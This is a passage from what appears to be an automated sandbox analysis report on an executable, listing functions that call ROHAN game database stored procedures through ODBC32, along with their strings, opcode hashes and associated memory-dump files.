                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_DelAffectSkill] (?, ?)}
                                                                                      • API String ID: 0-1209902986
                                                                                      • Opcode ID: ac954836d72ab2c1d9ce2c15af4dd9b6ee609027132b83f6606d1d3eabde852d
                                                                                      • Instruction ID: 7d007cab9077208fbd241ce5f218ce8f4a91a7d6cdb3851a0084688327eb9518
                                                                                      • Opcode Fuzzy Hash: ac954836d72ab2c1d9ce2c15af4dd9b6ee609027132b83f6606d1d3eabde852d
                                                                                      • Instruction Fuzzy Hash: 2D21D0B1A40614BBEB34CF54CC52FAB7374EB44B15F10828BF614BE2C4EAB569408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_CreateGuild](?, ?)},000000FD), ref: 0042D512
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042D551
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042D586
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000011,00000000,?,00000012,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042D5BE
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_CreateGuild](?, ?)}, xrefs: 0042D509
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_CreateGuild](?, ?)}
                                                                                      • API String ID: 0-3731619118
                                                                                      • Opcode ID: 25400ef72ae60b35b10ac756a59aa3a7bc3c53824cec239962395e25acd1899f
                                                                                      • Instruction ID: 765e977b5578a8600842d78c10502daf1c85ed079032b6d9a1b41eb8a7f3d5ff
                                                                                      • Opcode Fuzzy Hash: 25400ef72ae60b35b10ac756a59aa3a7bc3c53824cec239962395e25acd1899f
                                                                                      • Instruction Fuzzy Hash: 502106F1AC021B67EB248F44CC42FBA7374EB44B14F118199F7246F2C5D5B169808B5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetNGuildWinCount] (?,?)},000000FD), ref: 004345F8
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00434637
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043466C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004346A4
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetNGuildWinCount] (?,?)}, xrefs: 004345EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetNGuildWinCount] (?,?)}
                                                                                      • API String ID: 0-2149905267
                                                                                      • Opcode ID: 1af4d88b46235e1af88626fb7d934698f4bcb390a6fcf0a573b8f6c77287fa25
                                                                                      • Instruction ID: 5fbe43308dd4599014328381fde5bfd1661b618700f6442405d1d804e4b26825
                                                                                      • Opcode Fuzzy Hash: 1af4d88b46235e1af88626fb7d934698f4bcb390a6fcf0a573b8f6c77287fa25
                                                                                      • Instruction Fuzzy Hash: F32100B1740315ABEB20CF44CC52FA97334EB45B24F10C289F7186E6C5D9B569409F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_CheckMinigameMoneyWeb] (?, ?)},000000FD), ref: 00435616
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00435655
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043568A
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004356C2
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_CheckMinigameMoneyWeb] (?, ?)}, xrefs: 0043560D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_CheckMinigameMoneyWeb] (?, ?)}
                                                                                      • API String ID: 0-3577433670
                                                                                      • Opcode ID: e1ad13cf6e1ac05294e525ce01b1d79597b5cdf442e31343ab3de8726c913043
                                                                                      • Instruction ID: 76c4f905595d4063d4bc655ef7d6ee08179cd78ed979f58d67baf50e247ceecd
                                                                                      • Opcode Fuzzy Hash: e1ad13cf6e1ac05294e525ce01b1d79597b5cdf442e31343ab3de8726c913043
                                                                                      • Instruction Fuzzy Hash: BC2100B1A44214ABEB24DF54CC52FB97734EB84B18F108289F7586E2C4D7B669408F5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetCollectReward](?, ?)},000000FD), ref: 0043E62F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043E66E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043E6A3
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043E6DB
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetCollectReward](?, ?)}, xrefs: 0043E626
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetCollectReward](?, ?)}
                                                                                      • API String ID: 0-3049041908
                                                                                      • Opcode ID: 57ba5b26057a82974a373ec71f1e944b1259fb879f7b1d3da79dfd58943c16ed
                                                                                      • Instruction ID: 1b87a96f01e7ff343cb99f240ae9b5ae02e2ef475dd3700a345560a63b0dbcb1
                                                                                      • Opcode Fuzzy Hash: 57ba5b26057a82974a373ec71f1e944b1259fb879f7b1d3da79dfd58943c16ed
                                                                                      • Instruction Fuzzy Hash: 0C21E5B1644214BBEB28CF54CC52FE973B4EB88724F204289F7546E2C4D575AD908B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_DelLadderQuestState] (?,?)},000000FD), ref: 0043372A
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00433769
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043379E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004337D6
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_DelLadderQuestState] (?,?)}, xrefs: 00433721
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_DelLadderQuestState] (?,?)}
                                                                                      • API String ID: 0-837079177
                                                                                      • Opcode ID: 03d19c10e6079ecb02187bbad13d52db9000632fb53cf01920eddfe64db8c882
                                                                                      • Instruction ID: 952eb3473cac48b4786e4cde65f98544a001ad70410e384b9d4dc42b0507887c
                                                                                      • Opcode Fuzzy Hash: 03d19c10e6079ecb02187bbad13d52db9000632fb53cf01920eddfe64db8c882
                                                                                      • Instruction Fuzzy Hash: F92103B16852556BFB60CF44CC53FAE7335EB84B18F204289F7186E2C6D6B56D808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetNGuildWarItemReward] (?, ?)},000000FD), ref: 004357FA
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00435839
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00435871
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004358A6
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetNGuildWarItemReward] (?, ?)}, xrefs: 004357F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetNGuildWarItemReward] (?, ?)}
                                                                                      • API String ID: 0-143708698
                                                                                      • Opcode ID: cf69135fce14fe610be4da392cfa6d3fac3610f947dda3870c0c73eb1c65d2e2
                                                                                      • Instruction ID: 3f70403d1f9e0d5f9416ec2016d3611a665d2f8786cb7039e608f08ba40ed023
                                                                                      • Opcode Fuzzy Hash: cf69135fce14fe610be4da392cfa6d3fac3610f947dda3870c0c73eb1c65d2e2
                                                                                      • Instruction Fuzzy Hash: 452100B1640215ABEB248F84CC52FA97378EB44B2CF10C289F7146F2D5DBB56940DB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_ReturnMail](?, ?)},000000FD), ref: 0043F7AC
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043F7EB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043F820
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043F858
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_ReturnMail](?, ?)}, xrefs: 0043F7A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
